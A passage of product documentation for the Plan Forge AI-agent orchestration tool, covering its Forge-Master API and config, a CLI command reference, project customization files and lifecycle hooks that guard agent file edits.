After all replies arrive, Forge-Master runs a keyword-frequency divergence analysis across the reply texts and emits a dissent: { topic, axis } summary. Topic is what the models disagreed about; axis is the dimension of disagreement (timing, scope, model choice, etc.). The dashboard renders this as a one-line summary above the three replies so you can see the disagreement before reading.
Quorum dispatch uses Promise.allSettled with a 60s hard timeout per model. If 1 of 3 fails or times out, the remaining replies are returned with a partial: true flag. If all fail, the response is { ok: false, code: "QUORUM_ALL_FAILED" }.
| Method | Endpoint / tool | Description |
|---|---|---|
| MCP tool | forge_master_ask | One-shot reasoning. Accepts { message, sessionId? }; returns lane, via, toolCalls[], reply, costUSD. |
| POST | /api/forge-master/chat | Start a chat session (or continue an existing one with sessionId). Returns { sessionId, ... }. Pair with the SSE stream below to receive incremental tokens. |
| GET | /api/forge-master/chat/:sessionId/stream | Server-Sent Events stream for the session. Emits classification, quorum-estimate (if advisory triggers), tool-call, tool-result, delta (token chunks), done. |
| POST | /api/forge-master/chat/:sessionId/approve | Resolve a pending approval prompt mid-stream (used by quorum-estimate cancel, gated tool calls). |
| GET | /api/forge-master/session/:sessionId | Last ~10 turns for the session, for transcript replay. |
| GET | /api/forge-master/sessions | Recent sessions list. |
| GET | /api/forge-master/prompts | Prompt catalog used by the Studio sidebar. |
| GET | /api/forge-master/capabilities | Server capabilities snapshot (models, tier, advisory mode). |
| GET | /api/forge-master/cache-stats | Embedding cache liveliness: { size, hitRate, maxSize: 500 }. Use as a health probe. |
| GET / PUT | /api/forge-master/prefs | Read / write per-project Forge-Master preferences. Schema: { tier, autoEscalate, quorumAdvisory, embeddingFallback }. GET returns current values; PUT writes to .forge/fm-prefs.json. |
Forge-Master config lives under forgeMaster in .forge.json. All fields are optional, sensible defaults apply:
{
"forgeMaster": {
"reasoningModel": "claude-opus-4.6", // model used for replies in advisory lane
"routerModel": "grok-3-mini", // model used by stage-2 intent classifier
"quorumAdvisory": "auto", // "off" | "auto" | "always"
"embeddingFallback": true, // enable stage 1.5 embedding cache
"discoverExtensionTools": true, // allow extension-supplied tools to register
"providers": {
"githubCopilot": { "model": "gpt-4o" } // GitHub Models override (zero-key path)
}
}
}
| Field | Default | What it controls |
|---|---|---|
reasoningModel | model.default (or gpt-4o-mini) | Model used to compose replies in advisory lane. Falls back to .forge.json's top-level model.default. |
routerModel | grok-3-mini | Stage-2 intent classifier model. Cheap by design, it's classifying, not reasoning. |
quorumAdvisory | "off" | Enables Quorum Advisory Mode in the advisory lane. |
embeddingFallback | true | Enables the stage 1.5 embedding cache. Disable to force every cache-miss to the router LLM. |
discoverExtensionTools | true | Allow extensions in extensions/ to register tools that Forge-Master can call. |
providers.githubCopilot.model | gpt-4o-mini | Model used when routing through GitHub Models (zero-key path with gh auth login). |
The recommended setup path requires no API keys: run gh auth login once and Forge-Master auto-detects your GitHub token, then routes through GitHub Models. GitHub Copilot subscribers get this for free.
Set ANTHROPIC_API_KEY, OPENAI_API_KEY, or XAI_API_KEY only if you want to override the default with a premium model directly. The dashboard Settings → API Keys tab is the GUI equivalent.
The stage 1.5 cache is small, opinionated, and zero-config:
.forge/fm-sessions/embedding-cache.bin (binary Float32Array) plus a JSON metadata sidecarvia: "embedding-cache"all-MiniLM-L6-v2 via @xenova/transformers (lazy-loaded). When the package isn't installed, the cache uses a deterministic 32-bit hash bag-of-words baseline (hash-bag). Both produce 384-dim vectors that are L2-normalized.GET /api/forge-master/cache-stats returns { size, hitRate, maxSize: 500 }embeddingFallback: false in prefs to force every cache-miss to the router LLM. Useful when you're tuning intent vocabularies and want to measure raw stage-2 behavior.
Open localhost:3100/dashboard → Studio. Three panels:
POST /api/forge-master/chat to start, then subscribes to GET /api/forge-master/chat/:sessionId/stream. Shows live classification badge, tool-call trace as each tool fires, and the streaming reply token-by-token.Forge-Master turns also surface in the unified Timeline tab as fm-turn events (added v2.82). Each turn carries the lane, the user message (truncated to 200 chars), and the turn number, useful for retrospectives.
| Command | What it does |
|---|---|
pforge forge-master status | Health check: server up, cache loaded, last classification |
pforge forge-master logs [--tail N] | Tail recent turns from .forge/fm-sessions/*.jsonl |
offtopic. Check the via field in the response, if it says "keyword", the keyword scorer didn't match. Rephrase using one of the keyword-rich phrasings ("status of …", "why did … fail", "should we …"), or wait until embedding-cache warms up."auto""always" to remove the gating during testing, then revert. Note that operational/troubleshoot/build lanes are hard-blocked regardless of mode.@xenova/transformers isn't installed and the hash-bag fallback isn't matching well, install the peer dep for better embeddings; (3) embeddingFallback: false in prefs disables the stage entirely.gh auth login (zero-key path), set ANTHROPIC_API_KEY / OPENAI_API_KEY / XAI_API_KEY, or set forgeMaster.reasoningModel in .forge.json.offtopicrouterModel from grok-3-mini to grok-4 or gpt-4o-mini. The router runs once per prompt, small models are usually fine, but quirky vocabularies sometimes need more capability.
Every command, every flag, every example. The chapter you bookmark.
The pforge CLI is a convenience wrapper, two scripts, no dependencies beyond Git and your shell. Every command shows the equivalent manual steps, so non-CLI users can follow along.
| Platform | File | Usage |
|---|---|---|
| Windows / PowerShell | pforge.ps1 | .\pforge.ps1 <command> |
| macOS / Linux / Bash | pforge.sh | ./pforge.sh <command> |
setup.ps1 / setup.sh. If they're missing, copy them manually from the Plan Forge repo.
pforge analyze scores a plan's quality (traceability, coverage, gates, 0 to 100).forge_diagnose (MCP tool) investigates a bug in code (root cause, fix recommendations).Most people don't need every command. Find your use case, run the matching command:
| Goal | Command | When |
|---|---|---|
| Setup & daily housekeeping | ||
| Set up a new project | pforge init | First time on this repo |
| Check setup is healthy | pforge smith | Before reporting a bug; after upgrading |
| Validate file counts and templates | pforge check | Before committing setup changes |
| Update framework files | pforge update | After a new Plan Forge release |
| Planning & authoring | ||
| Start a new feature plan | pforge new-phase <name> | You have a feature in mind |
| Score a plan's quality before running it | pforge analyze <plan> | Right after hardening |
| See what files changed vs the plan's scope | pforge diff <plan> | Mid-execution; before commit |
| Find leftover TODO/FIXME/HACK markers | pforge sweep | Before declaring a slice done |
| Execution | ||
| Estimate cost before running | pforge run-plan <plan> --estimate | You want to know what this will cost first |
| Run a plan end-to-end (cheapest) | pforge run-plan <plan> | Plan is hardened and you trust it |
| Run with multi-model consensus | pforge run-plan <plan> --quorum=auto | High-stakes feature; complex slices |
| Resume after a failed slice | pforge run-plan <plan> --resume-from N | You fixed slice N−1's failure |
| Co-pilot mode (you code, gates check) | pforge run-plan <plan> --assisted | You want to write the code yourself |
| Troubleshooting | ||
| Investigate a failing slice | forge_diagnose({ file: "…" }) (MCP tool) | Slice failed and you don't know why |
| Run closed-loop drain | pforge audit-loop | Mass content audit (opt-in feature) |
| See chronological event history | pforge timeline | Forensic / "what happened on Tuesday?" |
| Post-deploy (LiveGuard) | ||
| Score code drift since baseline | pforge drift | After every deploy |
| Scan for high-entropy secrets | pforge secret-scan | Before every deploy (blocking) |
| Scan dependencies for CVEs | pforge dep-watch | Daily / before deploy |
| Compute health score 0–100 | pforge health-trend | Weekly / on alert |
Full command reference below, organized alphabetically. Each entry has the equivalent manual steps for non-CLI users.
setup.ps1 / setup.sh.| Flag | Type | Description |
|---|---|---|
-Preset | string | Tech preset: dotnet, typescript, python, java, go, swift, rust, php, azure-iac. Comma-separated for multi-preset. |
-ProjectPath | path | Target project directory (default: current dir) |
-Agent | string | Agent adapter: copilot, claude, cursor, codex, gemini, windsurf, generic, all |
.\pforge.ps1 init -Preset dotnet
.\pforge.ps1 init -Preset typescript -ProjectPath ./my-app
.\pforge.ps1 init -Preset dotnet -Agent all
./pforge.sh init --preset dotnet
./pforge.sh init --preset typescript --path ./my-app
./pforge.sh init --preset dotnet --agent all
.\setup.ps1 / ./setup.sh with your preferred parametersvalidate-setup.ps1 / validate-setup.sh.pforge check
.\validate-setup.ps1DEPLOYMENT-ROADMAP.md with their current status.pforge status
Phase Status (from DEPLOYMENT-ROADMAP.md):
─────────────────────────────────────────────
Phase 1: User Authentication 📋 Planned
Phase 2: Dashboard Widgets 🚧 In Progress
| Arg / Flag | Type | Description |
|---|---|---|
name | string (required) | Phase name, e.g. user-auth |
--dry-run | boolean | Preview without creating |
.\pforge.ps1 new-phase user-auth --dry-run
.\pforge.ps1 new-phase user-auth
docs/plans/Phase-3-USER-AUTH-PLAN.md from templateDEPLOYMENT-ROADMAP.md| Arg / Flag | Type | Description |
|---|---|---|
plan | path (required) | Path to plan file |
--dry-run | boolean | Preview without creating |
.\pforge.ps1 branch docs/plans/Phase-3-USER-AUTH-PLAN.md --dry-run
.\pforge.ps1 branch docs/plans/Phase-3-USER-AUTH-PLAN.md
| Arg / Flag | Type | Description |
|---|---|---|
plan | path (required) | Path to plan file |
slice | number (required) | Slice number |
--dry-run | boolean | Preview commit message without committing |
.\pforge.ps1 commit docs/plans/Phase-3.md 2 --dry-run
.\pforge.ps1 commit docs/plans/Phase-3.md 2
| Arg | Type | Description |
|---|---|---|
plan | path (required) | Path to plan file |
status | enum (required) | planned · in-progress · complete · paused |
.\pforge.ps1 phase-status docs/plans/Phase-3.md in-progress
.\pforge.ps1 phase-status docs/plans/Phase-3.md complete
pforge sweep
Completeness Sweep, scanning for deferred-work markers:
─────────────────────────────────────────────────────────
src/Services/UserService.cs:42: // TODO: Wire to real email service
src/Controllers/AuthController.cs:18: // FIXME: Add rate limiting
FOUND 2 deferred-work marker(s). Resolve before Step 5 (Review Gate).
Also available as: forge_sweep MCP tool
.\pforge.ps1 diff docs/plans/Phase-3-USER-AUTH-PLAN.md
Scope Drift Check, 4 changed file(s) vs plan:
──────────────────────────────────────────────────
✓ IN SCOPE src/Services/UserService.cs
✓ IN SCOPE src/Repositories/UserRepository.cs
● UNPLANNED src/Config/AppSettings.cs
● FORBIDDEN tests/Legacy/OldTests.cs
DRIFT DETECTED, 1 forbidden file(s) touched.
Also available as: forge_diff MCP tool
| Flag | Type | Description |
|---|---|---|
--quorum | boolean | Multi-model consensus analysis |
--mode | plan | file | Explicit analysis mode (auto-detected if omitted) |
--models | string | Comma-separated model override |
# Single-model analysis
.\pforge.ps1 analyze docs/plans/Phase-1-AUTH-PLAN.md
# Multi-model quorum
.\pforge.ps1 analyze docs/plans/Phase-1-AUTH-PLAN.md --quorum
# Analyze a code file directly
.\pforge.ps1 analyze src/services/billing.ts --mode file
| Dimension | Points | What It Checks |
|---|---|---|
| Traceability | 25 | MUST/SHOULD criteria exist, slices defined, criteria mapped to slices |
| Coverage | 25 | Changed files within Scope Contract, no forbidden edits |
| Test Coverage | 25 | MUST criteria matched against test files via keyword fuzzy matching |
| Gates | 25 | Validation gates referenced in slices, no deferred-work markers |
Exit codes: 0 = pass (≥60), 1 = fail (<60). Also available as: forge_analyze MCP tool.
pforge diagnose CLI command.| Parameter | Type | Description |
|---|---|---|
file (required) | string | Path to the source file to investigate (e.g., src/services/billing.ts) |
models | string | Comma-separated model override (default: quorum config models) |
path | string | Project directory (default: current) |
forge_diagnose({ file: "src/services/billing.ts" })
forge_diagnose({ file: "src/auth/token-validator.ts", models: "grok-3-mini,grok-4" })
Each model analyzes independently for: root cause, failure modes, reproduction steps, impact assessment, fix recommendations, regression risk. Results are returned inline to the calling agent (no on-disk persistence by default).
Reference: pforge-mcp/tools.json » forge_diagnose. Adjacent CLI command: pforge analyze for plan quality (different surface).
| Flag | Type | Default | Description |
|---|---|---|---|
--estimate | boolean | — | Cost prediction only, no execution. Always backed by forge_estimate_quorum, never hand-computed. |
--assisted | boolean | — | Human codes, orchestrator validates gates |
--model | string | — | Model override (e.g., claude-sonnet-4.6) |
--resume-from | number | — | Skip completed slices, resume from N |
--dry-run | boolean | — | Parse and validate without executing |
--quorum | auto | power | speed | false | auto | Quorum preset. auto: threshold-based escalation. power: flagship models, threshold 5 (premium tier). speed: fast models, threshold 7. false: disable. |
--quorum-threshold | number | 6 | Override the complexity threshold for auto-quorum (1–10). Implied by --quorum=power|speed. |
# Estimate cost without executing (always tool-backed via forge_estimate_quorum)
.\pforge.ps1 run-plan docs/plans/Phase-7.md --estimate
# Full auto execution
.\pforge.ps1 run-plan docs/plans/Phase-7.md
# Assisted mode
.\pforge.ps1 run-plan docs/plans/Phase-7.md --assisted
# Resume from slice 3 after fixing a failure
.\pforge.ps1 run-plan docs/plans/Phase-7.md --resume-from 3
# Quorum presets (v2.82)
.\pforge.ps1 run-plan docs/plans/Phase-7.md --quorum=power # flagship models, threshold 5
.\pforge.ps1 run-plan docs/plans/Phase-7.md --quorum=speed # fast models, threshold 7
.\pforge.ps1 run-plan docs/plans/Phase-7.md --quorum=auto --quorum-threshold 8
| Mode | Flag | What Happens |
|---|---|---|
| Full Auto | (default) | gh copilot CLI executes each slice with full project context. Routing honors a host-aware preference so non-Copilot hosts (Claude Code, Cursor, Windsurf, Zed) prefer direct API to honor your subscription. |
| Assisted | --assisted | You code in VS Code; orchestrator prompts and validates gates |
| Estimate | --estimate | Shows slice count, token estimate, and cost, without executing. Returns the same numbers as the forge_estimate_quorum tool. |
Results written to: .forge/runs/<timestamp>/. Also available as: forge_run_plan MCP tool.
FIX: suggestion.pforge smith
| Category | Checks |
|---|---|
| Environment | git, VS Code CLI, PowerShell/bash version, GitHub CLI |
| VS Code Config | chat.agent.enabled, chat.useCustomizationsInParentRepositories, chat.promptFiles |
| Setup Health | .forge.json valid, copilot-instructions.md exists, file counts match preset |
| Version Currency | Installed templateVersion vs source VERSION |
| Common Problems | Duplicate instructions, orphaned agents, missing applyTo, unresolved placeholders |
Also available as: forge_smith MCP tool.
| Subcommand | Description |
|---|---|
ext search [query] | Browse the community catalog. Omit query for all extensions. |
ext add <name> | Download and install from catalog in one step. |
ext info <name> | Show detailed info before installing. |
ext install <path> | Install from a local directory path. |
ext list | List all installed extensions. |
ext remove <name> | Remove an installed extension. |
ext publish <path> | Generate a catalog entry for submission via PR. |
.\pforge.ps1 ext search saas
.\pforge.ps1 ext add saas-multi-tenancy
.\pforge.ps1 ext info plan-forge-memory
.\pforge.ps1 ext list
.\pforge.ps1 ext remove healthcare-compliance
.\pforge.ps1 ext publish .forge/extensions/my-extension
Also available as: forge_ext_search, forge_ext_info MCP tools.
| Flag | Type | Description |
|---|---|---|
source | path (optional) | Plan Forge source path (auto-detects ../plan-forge) |
--dry-run | boolean | Preview changes without applying |
--force | boolean | Skip confirmation prompt |
.\pforge.ps1 update
.\pforge.ps1 update C:\path\to\plan-forge --dry-run
.\pforge.ps1 update --force
| Updated (safe to replace) | Never Touched (your files) |
|---|---|
| Pipeline prompts, agents, shared instructions, runbook, lifecycle hooks, new preset files | copilot-instructions.md, project-profile, project-principles, DEPLOYMENT-ROADMAP.md, .forge.json, plan files, existing preset files |
pforge.ps1 doesn't have the update command yet (pre-v1.2.1), download the latest script first, then run pforge update.
pforge help
.forge.json → audit.mode = "auto" | "always", or use --auto to respect the config.| Flag | Type | Default | Description |
|---|---|---|---|
--auto | boolean | — | Respect .forge.json#audit.mode, skip cleanly if off |
--max | number | 5 | Maximum drain rounds before terminating |
--dry-run | boolean | — | Scan + triage but skip fix dispatch |
--env | dev | staging | dev | Environment name passed to content-audit scanner. Production is hard-blocked unless allowProduction: true in scanner opts. |
# One-shot manual drain (3 rounds max, dry-run)
pforge audit-loop --max 3 --dry-run
# Respect .forge.json#audit config (most common in CI)
pforge audit-loop --auto
# Drain against staging
pforge audit-loop --auto --env staging
bug (registers in the bug registry), spec (submits to Crucible for re-smelting), or classifier (writes a local proposal artifact under .forge/audits/ for human review). The classifier-reviewer agent in .github/agents/ can audit the classifier's lane choices read-only.
Also available as: forge_tempering_drain MCP tool, POST /api/tempering/drain REST endpoint, and the /audit-loop slash-command skill in chat.
| Flag | Type | Default | Description |
|---|---|---|---|
--window | duration | 24h | Lookback window (e.g., 1h, 24h, 7d) |
--from / --to | ISO datetime | — | Explicit range (overrides --window) |
--source | string | all | Filter to one source: run, incident, bug, deploy, crucible, fm-turn, memory, tempering, watch |
--correlation | string | — | Filter to one correlation id (run id, incident id, etc.) |
--group-by | source | hour | day | — | Bucket events for a summary view |
--limit | number | 200 | Max events returned |
--json | boolean | — | Machine-readable JSON output |
# Last 24h, all sources
pforge timeline
# Last hour, only Forge-Master turns
pforge timeline --window 1h --source fm-turn
# Everything tied to one run
pforge timeline --correlation run-2026-05-04T120000
# Daily summary for the past week, grouped by source
pforge timeline --window 7d --group-by source
# JSON for piping into jq / scripts
pforge timeline --window 24h --json | jq '.[] | select(.source == "incident")'
Also available as: forge_timeline MCP tool, GET /api/timeline REST endpoint, and the Timeline tab on the dashboard.
Post-coding intelligence commands. All run locally, no network unless openclaw.endpoint is configured.
pforge drift
pforge drift --since HEAD~5Also available as: forge_drift_report MCP tool.
resolvedAt for MTTR tracking.| Flag | Type | Description |
|---|---|---|
--severity | enum | critical · high · medium · low |
--files | string | Comma-separated affected file paths, e.g. src/api/handler.ts |
pforge incident "Auth token validation bypass" --severity critical --files src/auth/validator.ts
pforge incident "Slow query on dashboard load" --severity medium
| Flag | Type | Description |
|---|---|---|
--min-severity | enum | Filter by minimum severity: critical · high · medium · low |
--max | number | Maximum number of results to display |
pforge triage
pforge triage --min-severity medium --max 10
| Flag | Type | Description |
|---|---|---|
--version | string | Deployment version, e.g. v2.27.0 |
--env | string | Target environment, e.g. production |
--status | enum | success · failure · rollback |
pforge deploy-log --version v2.27.0 --env production --status success
pforge deploy-log --version v2.27.0 --env staging --status failure
| Flag | Type | Description |
|---|---|---|
--plan | path | Path to plan file, e.g. docs/plans/Phase-LiveGuard-v2.27.0-PLAN.md |
pforge regression-guard --plan docs/plans/Phase-LiveGuard-v2.27.0-PLAN.md
| Flag | Type | Description |
|---|---|---|
--plan | path | Path to plan file |
pforge runbook --plan docs/plans/Phase-7-DASHBOARD-PLAN.md
| Flag | Type | Description |
|---|---|---|
--top | number | Number of files to display (default: 10) |
--since | string | Git log time range, e.g. "3 months ago" |
pforge hotspot
pforge hotspot --top 15 --since "3 months ago"
pforge dep-watch
| Flag | Type | Description |
|---|---|---|
--since | string | Git ref range to scan, e.g. HEAD~3 |
--threshold | number | Entropy threshold for detection (default: 4.5), e.g. 4.0 |
pforge secret-scan
pforge secret-scan --since HEAD~3 --threshold 4.0
Also available as: forge_secret_scan MCP tool.
.env files. Keys only, values are never read.| Flag | Type | Description |
|---|---|---|
--baseline | path | Baseline env file, e.g. .env |
--files | string | Comma-separated env files to compare, e.g. .env.staging,.env.production |
pforge env-diff
pforge env-diff --baseline .env --files .env.staging,.env.production
Also available as: forge_env_diff MCP tool.
| Flag | Type | Description |
|---|---|---|
--days | number | Number of days to include (default: 14), e.g. 30 |
pforge health-trend
pforge health-trend --days 30
| Flag | Type | Description |
|---|---|---|
--source | enum (required) | regression · drift · incident · secret |
--incident-id | string (optional) | Specific incident ID (used when source=incident) |
pforge fix-proposal --source regression
pforge fix-proposal --source drift
pforge fix-proposal --source secret
pforge fix-proposal --source incident --incident-id INC-2026-04-001Also available as: forge_fix_proposal MCP tool, POST /api/fix/propose REST endpoint (requires auth).
docs/plans/auto/LIVEGUARD-FIX-*.md and fill in the TODO markers, then pforge run-plan --assisted <plan> on a branch.| Flag | Type | Description |
|---|---|---|
--source | enum (required) | drift · triage · incident · runbook · fix-proposal |
--goal | enum (optional) | root-cause · risk-assess (default) · fix-review · runbook-validate |
--custom-question | string (optional) | Freeform question that overrides --goal (max 500 chars) |
--quorum-size | number (optional) | Model vote count requested in the prompt (default 3) |
pforge quorum-analyze --source triage
pforge quorum-analyze --source drift --goal root-cause
pforge quorum-analyze --source incident --custom-question "Which fix should I prioritize given the sprint deadline?"Also available as: forge_quorum_analyze MCP tool, POST /api/quorum/prompt REST endpoint (no auth required).
Six commands shipped between v2.99 and v3.5 that postdate the original CLI reference. Each is a thin wrapper over a v3.x MCP tool or subsystem, see the per-command "Also available as" link for the full MCP / REST mapping.
.github/copilot-memory-hints.md from forge decisions, trajectories, auto-skills, OpenBrain entries. Hash-deduped and atomic; safe to run repeatedly. See Chapter 26 — Copilot Integration Trilogy.| Flag | Type | Description |
|---|---|---|
--since | duration (optional) | Limit to trajectories in the last N (e.g. 14d, 30d). Default: 50 most recent. |
--explain | flag (optional) | Verbose: show which entries were included/excluded and why |
--preview | flag (optional) | Generate without writing, print the diff |
pforge sync-memories
pforge sync-memories --since=14d
pforge sync-memories --preview --explainAlso available as: forge_sync_memories MCP tool.
.github/copilot-instructions.md by composing project profile + principles + extra instruction files + .forge.json commitments. Output is deterministic; same inputs produce identical files.| Flag | Type | Description |
|---|---|---|
--preview | flag (optional) | Generate without writing, print the resulting content |
--force | flag (optional) | Overwrite even if content hash matches (bypass dedup) |
pforge sync-instructions
pforge sync-instructions --preview
pforge sync-instructions --forceAlso available as: forge_sync_instructions MCP tool, POST /api/copilot-instructions/sync REST endpoint.
| Flag | Type | Description |
|---|---|---|
--peer | string (optional) | Limit sync to one configured peer name |
--apply | flag (optional) | Write the merged records (default: dry-run) |
--since | duration (optional) | Only consider records newer than N (default: 7d) |
pforge sync-spaces # dry-run, all peers
pforge sync-spaces --peer=billing-svc --apply
pforge sync-spaces --since=30d --applyConfigured under brain.federation.repos in .forge.json.
| Flag | Type | Description |
|---|---|---|
--min-severity | enum (optional) | low · medium · high · critical (default: medium) |
--max-slices | number (optional) | Cap the number of slices (default: 10) |
--phase-name | string (optional) | Override the auto-generated phase name |
pforge plan-from-sarif codeql-results.sarif
pforge plan-from-sarif scan.sarif --min-severity=high --max-slices=5
pforge plan-from-sarif sec.sarif --phase-name="Phase-SEC-FIX"Writes to docs/plans/Phase-N-PLAN.md. Plan still needs hardening via step2-harden-plan.prompt.md before execution.
| Flag | Type | Description |
|---|---|---|
--since | duration (optional) | Window (default: 24h). Common: 7d for weekly roll-up. |
--format | enum (optional) | markdown (default) · json |
--post | flag (optional) | Send via configured notification channel (Slack, Teams, etc.) |
--rebuild | flag (optional) | Recompute from logs instead of reading cached .forge/digests/YYYY-MM-DD.json |
pforge digest # today's, markdown
pforge digest --since=7d # weekly
pforge digest --format=json | jq # pipe-friendly
pforge digest --post # broadcast to configured channelBacks the Yesterday's Digest dashboard tile. Cron-friendly: pforge digest --post at 09:00 weekdays = free standup.
forge_sweep + forge_tempering_drain in a single tightened loop suitable for pre-release gates.| Flag | Type | Description |
|---|---|---|
--strict | flag (optional) | Exit non-zero on any finding (default: report-only) |
--include | glob (optional) | Limit scan to files matching a glob (default: all tracked) |
--max-rounds | number (optional) | Cap convergence rounds (default: 3) |
pforge hammer-fm
pforge hammer-fm --strict # CI gate
pforge hammer-fm --include="src/**/*.ts"Pairs well with forge_classifier_issue when findings are noise rather than bugs, see Chapter 27 — Team Coordination.
.forge/forge-master/sessions/.| Flag | Type | Description |
|---|---|---|
--resume | string (optional) | Session ID to continue (omit to start new) |
--model | string (optional) | Override the configured Forge-Master model |
--quiet | flag (optional) | Suppress thought-trace output (final answer only) |
pforge fm-session "Why did Phase-31 slice 4 fail?"
pforge fm-session --resume=fm-7f3a-...
pforge fm-session --quiet "What's the cheapest quorum for Phase-32?"Also available as: forge_master_ask MCP tool (one-shot), POST /api/forge-master/ask REST endpoint.
fm-session --resume=... from.| Flag | Type | Description |
|---|---|---|
--limit | number (optional) | Max results (default: 5) |
--since | duration (optional) | Only sessions from last N (default: 90d) |
--json | flag (optional) | Machine-readable output |
pforge fm-recall "gate timeout"
pforge fm-recall "snapshot pop strategy" --limit=10
pforge fm-recall "cost anomaly Phase-31" --since=30d --jsonBacked by the L2 search index over .forge/forge-master/sessions/*.jsonl.
The MCP server is started directly with Node.js, not through the pforge CLI:
.vscode/mcp.json for auto-start.# Full MCP server (normal usage, started by VS Code via mcp.json)
node pforge-mcp/server.mjs
# Dashboard + REST API only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only
# Custom project path
node pforge-mcp/server.mjs --project /path/to/project
This chapter covers the happy path for each command. For exhaustive edge-case documentation, see the source: CLI-GUIDE.md on GitHub
Make it yours: principles, profiles, custom instructions, configuration hierarchy.
Every project gets two layers of guardrails. Layer 1 is your non-negotiable standards, the rules every project gets whether they ask or not. Layer 2 is your project's specific ambitions, the coverage targets, latency SLAs, and domain rules that make this project different from the last one.
Ships with every preset. Architecture, security, testing, error handling, type safety, async patterns. You get these automatically.
Generated per-project. Coverage targets, latency SLAs, compliance requirements, domain rules. You customize these.
If Layer 2 conflicts with Layer 1, Layer 2 wins for that specific project. Example: Layer 1 says "TDD for business logic" → Layer 2 says "TDD for ALL code" → Layer 2 applies.
Principles declare what your project believes, non-negotiable commitments about technology, architecture, and quality. They're checked automatically during Steps 1, 2, and 5.
.github/prompts/project-principles.prompt.mddocs/plans/PROJECT-PRINCIPLES.md## Technology Commitments
- PostgreSQL for all persistence, no MongoDB, no SQLite in production
- All services communicate via gRPC, no REST between internal services
## Architecture Commitments
- All data access goes through repositories, no direct SQL in services
- Background jobs use BackgroundService + PeriodicTimer, no Hangfire
## Quality Commitments
- 90% test coverage on business logic, non-negotiable
- No secrets in code, ever. Use IConfiguration + Key Vault
The profile tells the AI how to write code, generated from an interview about your standards:
.github/prompts/project-profile.prompt.md.github/instructions/project-profile.instructions.md| Project Principles | Project Profile | |
|---|---|---|
| What it is | "We use PostgreSQL, not MongoDB" | "Use parameterized queries with Dapper" |
| Who writes it | You (or guided by workshop) | Generated from interview |
| Testing | "90% coverage, non-negotiable" | "Use xUnit with [Fact] and [Theory]" |
| When it matters | Rejects a PR that uses MongoDB | Tells AI how to write the query |
copilot-instructions.mdThis is the master config file, loaded every session, for every file. Keep it focused:
applyTo patterns.
Create a new .instructions.md file in .github/instructions/ with YAML frontmatter:
---
description: Billing domain rules, Stripe integration, invoice generation
applyTo: "**/billing/**,**/invoices/**,**/payments/**"
---
# Billing Domain Rules
- All money amounts stored as `decimal(18,4)`, never `float`
- Use Stripe SDK v45+, never raw HTTP calls
- Every payment mutation must be idempotent (use idempotency keys)
- Invoice PDFs generated async via background service
- All billing events published to `billing.*` topic
When you edit src/billing/InvoiceService.cs, this file loads automatically alongside the universal baseline.
applyTo Pattern Reference| Pattern | Loads When |
|---|---|
'**' | ALL files (use sparingly) |
'**/*.cs' | Any C# file |
'**/*.test.ts' | TypeScript test files |
'**/auth/**' | Files in any auth/ directory |
'docs/plans/**' | Plan documents |
Agent definitions live in .github/agents/. Each is a Markdown file with YAML frontmatter that declares the agent's role, tool restrictions, and expertise:
---
name: "billing-reviewer"
description: "Audit billing code for Stripe compliance and financial accuracy"
tools: ["read_file", "grep_search", "semantic_search"]
---
Agents are read-only, they can search and read but can't edit files. This makes them safe to run as independent auditors. To create a new agent, copy an existing one and modify the expertise section.
| Agent | Role | How to invoke |
|---|---|---|
plan-health-auditor |
Reads run history, memories, bugs, and the active plan to report on slice sizing, gate coverage, missing forbidden actions, and scope contract completeness. Emits a markdown report to .forge/health/latest.md. |
forge_master_ask({ message: "@plan-health-auditor weekly report" }) or forge_delegate_to_agent with agent: "plan-health-auditor". |
Plan Forge ships a built-in plan-health-auditor agent (.github/agents/plan-health-auditor.agent.md) that reads plan files and reports on slice sizing, gate coverage, missing forbidden actions, and scope contract completeness. Invoke it via forge_delegate_to_agent with agent: "plan-health-auditor" or from the Dashboard Agents tab. Read-only; cannot modify plans.
Skills are multi-step procedures in .github/skills/*/SKILL.md. Each skill defines steps, validation gates, and expected outputs. Every skill follows the Skill Blueprint format, including Temper Guards, Warning Signs, and Exit Proof sections. To create a custom skill:
.github/skills/my-workflow/SKILL.md with steps, gates, and description/my-workflow in Copilot ChatPlan Forge fires eight lifecycle hooks across three buckets. The Copilot session hooks live in .github/hooks/plan-forge.json and run during every agent turn; the LiveGuard / orchestration hooks are configured in .forge.json#hooks and fire during plan execution; the plan-execution guard is a single Node script that runs ahead of every commit during pforge run-plan. The tables below are the normative reference, every hook the orchestrator knows about, what triggers it, what it can block, and where to configure it. The canonical ordered list of hook names is the HOOK_PASCAL array in pforge-mcp/enums.mjs — both pforge smith (PowerShell + bash) and the orchestrator read from this single source of truth.
Configured in .github/hooks/plan-forge.json. Scripts live in .github/hooks/scripts/ with a .sh POSIX variant and a .ps1 Windows variant; the hook runner picks the right one per host. The default timeout for each hook is shown in the Timeout column, long-running scripts that exceed it are killed and skipped (not failed).
| Hook | Trigger | Effect | Blocks? | Timeout | Script |
|---|---|---|---|---|---|
SessionStart |
Once at the start of every Copilot session. | Injects Project Principles, current phase, and Forbidden Actions from the active plan into the agent's context. Also drains queued OpenBrain entries from .forge/openbrain-queue.jsonl when present. |
No (advisory) | 10 s | session-start.{sh,ps1} |
PreToolUse |
Before every agent tool call that writes to the filesystem. | Two checks run in series: check-forbidden compares the target path against the active plan's Forbidden Actions block; check-predeploy short-circuits when a slice is about to enter a deploy step. Either can deny the tool call. |
Yes | 5 s / 10 s | check-forbidden.{sh,ps1} · check-predeploy.{sh,ps1} |
PostToolUse |
After every agent tool call that wrote to the filesystem. | Auto-formats the touched file with the project's formatter (Prettier, dotnet format, Black, etc.) and then runs a quick scan for stub markers (TODO, FIXME, "throw new NotImplementedException", etc.). Stub findings are advisory, they surface in the agent's next turn but do not block. | No (advisory) | 15 s / 15 s | post-edit-format.{sh,ps1} · post-edit-validate.{sh,ps1} |
Stop |
When the agent's turn ends. | Warns if files were edited during the turn but no test run was detected. This is the "don't ship untested changes" guard rail. Output appears in the next turn's context as a banner. | No (advisory) | 10 s | stop-check-tests.{sh,ps1} |
To disable a session hook for one project, edit .github/hooks/plan-forge.json and remove the entry from the relevant array. To disable a session hook globally, delete or rename the file, missing hook files are silently ignored.
Configured in .forge.json#hooks. These fire during plan execution, the orchestrator invokes the relevant hook function directly (no shell scripts) and reads the matching .forge.json sub-block to pick up project-specific tuning. All hooks are opt-in at the project level and ship with safe defaults.
| Hook | Trigger | Effect | Blocks? | Configure |
|---|---|---|---|---|
PreDeploy |
Before pforge run-plan enters a slice flagged as a deploy step. |
